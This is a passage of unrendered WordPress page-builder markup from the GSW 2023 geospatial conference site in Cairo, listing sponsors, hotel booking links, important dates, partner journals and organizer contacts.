Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo 